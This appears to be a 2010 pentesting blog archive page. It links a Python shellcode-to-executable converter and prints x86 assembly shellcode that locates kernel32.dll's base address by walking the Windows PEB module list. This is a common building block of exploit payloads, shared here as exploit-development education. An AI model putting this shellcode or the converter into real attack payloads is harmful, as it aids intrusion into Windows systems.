Archive for shellcode

Converting shellcode to executable files using InlineEgg

Posted in Pentesting on 9 February, 2010 by __fastcall

I like small utils, gadget ones. This article, which can be found at the Breaking Code blog, does not have that important a functionality, but it's really cute!

EDITED on 10/2/2010 in order to prevent any misunderstandings. Thanks go to a visitor's comment, which alerted me about how to write reposts so that they do not look like my own.

There is a web page at http://sandsprite.com/shellcode_2_exe.php where you can convert shellcode directly to an executable. The author of the Breaking Code blog wrote this quick Python script using CORE's InlineEgg package. According to the author, it may be buggy.

Enjoy! :)

Download

shellcode2exe.py

Get kernel32.dll imagebase in Windows 7

Posted in Exploits on 26 December, 2009 by __fastcall

This one is taken from skypher's blog. It's a shellcode for getting the kernel32.dll base address. Before Windows 7, kernel32.dll was the second module in the PEB's InInitializationOrderModuleList (ntdll.dll comes first). Windows 7 loads kernelbase.dll before kernel32.dll, so kernel32.dll is now third. A universal way to get the kernel32.dll base address is to walk the list and check each module's base name for a null terminator after the 12th Unicode character (offset 12*2 bytes), because "kernel32.dll" is exactly 12 characters long. Here is the code for getting kernel32.dll before Windows 7.

    XOR     ECX, ECX                    ; ECX = 0
    MOV     ESI, [FS:ECX + 0x30]        ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (ntdll.dll)
    LODSD                               ; EAX = PEB->Ldr.InInitOrder.flink (kernel32.dll)
    MOV     EBP, [EAX + 0x08]           ; EBP = PEB->Ldr.InInitOrder.flink.base_address

And the universal one, which walks the list until it finds the module whose base name is 12 characters long:

    XOR     ECX, ECX                    ; ECX = 0
    MOV     ESI, [FS:ECX + 0x30]        ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder
next_module:
    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
    MOV     EDI, [ESI + 0x20]           ; EDI = InInitOrder[X].module_name (unicode)
    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink (next module)
    CMP     [EDI + 12*2], CL            ; Check modulename[12] == 0x??00 // for Win2k the register has to be CX
    JNE     next_module                 ; No: try next module.

I've seen one other alternative, like iterating the module list until the third record, but they say that it does not work well for Win2k, so I prefer skypher's method.